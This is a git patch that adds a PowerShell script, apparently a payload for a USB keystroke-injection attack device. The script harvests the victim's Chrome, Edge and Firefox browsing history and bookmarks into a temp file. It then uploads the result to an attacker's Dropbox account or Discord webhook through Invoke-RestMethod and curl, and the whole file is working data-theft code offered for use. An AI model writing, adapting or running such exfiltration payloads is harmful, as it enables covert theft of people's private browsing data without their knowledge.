From 2142269efb2d459e461d932e12741cf8769a9b15 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Wed, 21 Dec 2022 18:29:39 -0600 Subject: [PATCH] Create browserData.ps1 --- Payloads/Flip-BrowserData/browserData.ps1 | 91 +++++++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 Payloads/Flip-BrowserData/browserData.ps1 diff --git a/Payloads/Flip-BrowserData/browserData.ps1 b/Payloads/Flip-BrowserData/browserData.ps1 new file mode 100644 index 0000000..8c29012 --- /dev/null +++ b/Payloads/Flip-BrowserData/browserData.ps1 @@ -0,0 +1,91 @@ +function Get-BrowserData { + + [CmdletBinding()] + param ( + [Parameter (Position=1,Mandatory = $True)] + [string]$Browser, + [Parameter (Position=1,Mandatory = $True)] + [string]$DataType + ) + + $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' + + if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"} + elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"} + elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"} + + + $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique + $Value | ForEach-Object { + $Key = $_ + if ($Key -match $Search){ + New-Object -TypeName PSObject -Property @{ + User = $env:UserName + Browser = $Browser + DataType = $DataType + Data = $_ + } + } + } +} + +Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP--BrowserData.txt + +Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\--BrowserData.txt + + + +# Upload output file to dropbox + +function dropbox { +$TargetFilePath="/$ZIP" +$SourceFilePath="$env:TEMP\$ZIP" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){dropbox} + +############################################################################################################################################################ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"} + + + +############################################################################################################################################################